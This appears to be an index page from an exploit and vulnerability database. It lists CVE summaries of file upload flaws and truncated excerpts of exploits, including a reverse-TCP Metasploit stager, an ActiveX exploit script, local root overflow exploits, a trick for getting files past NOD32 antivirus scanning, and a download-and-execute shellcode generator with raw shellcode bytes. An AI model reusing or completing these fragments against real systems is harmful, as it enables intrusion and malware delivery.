CVE-2008-3742

Unrestricted file upload vulnerability in the BlogAPI module in Drupal 5.x before 5.10 and 6.x before 6.4 allows remote authenticated users to execute arbitrary code by uploading a file with an executable extension, which is not validated...

Unrestricted file upload

Unrestricted file upload vulnerability in the BlogAPI module in Drupal 5.x before 5.10 and 6.x before 6.4 allows remote authenticated users to execute arbitrary code by uploading a file with an executable extension, which is not validated...

CVE-2008-3742

Unrestricted file upload vulnerability in the BlogAPI module in Drupal 5.x before 5.10 and 6.x before 6.4 allows remote authenticated users to execute arbitrary code by uploading a file with an executable extension, which is not validated...

Reflective DLL Injection, Reverse TCP Stager (No NX or Win7)

Inject a DLL via a reflective loader. Connect back to the attacker No NX This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule CachedSize = 177 include Msf::Payload::Stager include...

CVE-2008-3592

Unrestricted file upload vulnerability in the File Manager in the admin panel in Twentyone Degrees Symphony 1.7.01 and earlier allows remote attackers to execute arbitrary code by uploading a file with an executable extension to a directory specified in the destination parameter, then accessing t...

CVE-2008-3592

Unrestricted file upload vulnerability in the File Manager in the admin panel in Twentyone Degrees Symphony 1.7.01 and earlier allows remote attackers to execute arbitrary code by uploading a file with an executable extension to a directory specified in the destination parameter, then accessing t...

Unrestricted file upload

Unrestricted file upload vulnerability in upload.php in the Giulio Ganci Wp Downloads Manager module 0.2 for WordPress allows remote attackers to execute arbitrary code by uploading a file with an executable extension via the upfile parameter, then accessing it via a direct request to the file in...

MS Office Snapshot Viewer ActiveX Exploit (executable version)-vulnerability warning-the black bar safety net

By:lcx Executable version, please do not used for illegal purposes. script type="text/javascript" function killErrors return true; window. onerror = killErrors; var x; var obj; var mycars = new Array; mycars0 = "c:/Program Files/Outlook Express/wab.exe"; mycars1 = "d:/Program Files/Outlook...

Linux Kernel (<= 2.4.27 , 2.6.8) binfmt_elf Executable File Read Exploit

No description provided by source. / binfmtelf executable file read vulnerability gcc -O3 -fomit-frame-pointer elfdump.c -o elfdump Copyright c 2004 iSEC Security Research. All Rights Reserved. THIS PROGRAM IS FOR EDUCATIONAL PURPOSES ONLY IT IS PROVIDED "AS IS" AND WITHOUT ANY WARRANTY. COPYING,...

TerminatorX <= 3.81 stack overflow local root exploit

No description provided by source. / TerminatorX V. = 3.81 local root exploit by Li0n7 Typical local stack-based overflow Bugs discovered by c0wboy from 0x333 Contact Li0n7 voila fr Usage: ./terminatorX-exp -r RET-b -s STARTINGRET -r RET: no bruteforcing, try to execute shellcode with RET as retu...

Dedecms V5可执行文件上传漏洞

这是一个比较有意思的东西，但是成功利用起来并不容易，呵呵。 首先看configrglobals.php文件，摘的一段代码如下。这里作者本意是为了帮我们注册变量的，但是他却疏忽了我们不但能注册变量，还能覆盖一些变量。configrglobalsmagic.php也有同样的问题 ………………………………………………………………………… ifisarray$GET foreach$GET AS $key = $value $$key = $value; //可以覆盖任意变量 ………… …………………………………………………………………………...

Solaris 2.5.1/2.6/7/8 rlogin /bin/login Buffer Overflow Exploit (SPARC)

No description provided by source. / $Id: raptorrlogin.c,v 1.1 2004/12/04 14:44:38 raptor Exp $ raptorrlogin.c - rlogin, Solaris/SPARC 2.5.1/2.6/7/8 Copyright c 2004 Marco Ivaldi [email protected] Buffer overflow in login in various System V based operating systems ...

HP Instant Support 1.0.22 - HPISDataManager.dll StartApp ActiveX Control Insecure Method

HP Instant Support 1.0.22 - HPISDataManager.dll StartApp ActiveX Control Insecure Method source: https://www.securityfocus.com/bid/29533/info HP Instant Support 'HPISDataManager.dll' ActiveX control is prone to an insecure-method vulnerability. Successfully exploiting this issue allows remote...

Through the NOD of memory why so trouble-vulnerability warning-the black bar safety net

You want to move the hard drive inside the aio to elsewhere, always to NOD32 kill, depressing the ball. Is there any method to go around? The method is, of course, the key to see you have no creativity, hehe. nod32 virus scanning before will first look at the file suffix is not an executable file...

Windows Executable (PE) Files (CVE-2008-1437; CVE-2010-0233)

The Microsoft Malware Protection Engine provides the scanning, detection and cleaning capabilities for the following antivirus and antispyware clients: Windows Live OneCare, Microsoft Forefront Security, Microsoft Antigen, and Windows Defender. A denial of service vulnerability has been reported ...

CVE-2008-2110

Unrestricted file upload vulnerability in qtofm.php in QTOFileManager 1.0 allows remote attackers to execute arbitrary PHP code by uploading a file with an executable extension, then accessing it via a direct request...

CVE-2008-1988

Unrestricted file upload vulnerability in the fileupload function in core/misc.class.php in EncapsGallery 2.0.2 allows remote authenticated administrators to upload and execute arbitrary PHP files by uploading a file with an executable extension, then accessing it via a direct request to the file...

Nik Software Sharpener Pro vulnerable to privilege escalation

Overview The Nik Software Shapener Pro installs files with insecure permissions, which may allow a local attacker to elevate privileges. Description Nik Software Sharpener Pro is an Adobe Photoshop plug-in that provides image sharpening capabilities. The Nik Software Sharpener Pro installer sets...

xnview-overflow.txt

-------- XNview -------- Informations : Version : 1.92.1 Website : http://www.xnview.com/ Problem : Long Filename Overflow Description: XnView is an efficient multimedia viewer, browser, and converter. It supports more than 400 graphic file formats PNG, JPEG, TARGA, TIFF, GIF, BMP, and more...

win32 Download and Execute Shellcode Generator (browsers edition)

No description provided by source. !/usr/bin/perl $loadingurl=$ARGV0; chomp $loadingurl; my @buffer; if $loadingurl eq "" $sco = 'ERROR!!! Enter url to remote exe.'; buffergen$sco; print @buffer; exit; $c= generatechar0; $sco= "\xE8\x56\x00\x00\x00\x53\x55\x56\x57\x8B\x6C\x24\x18\x8B\x45"...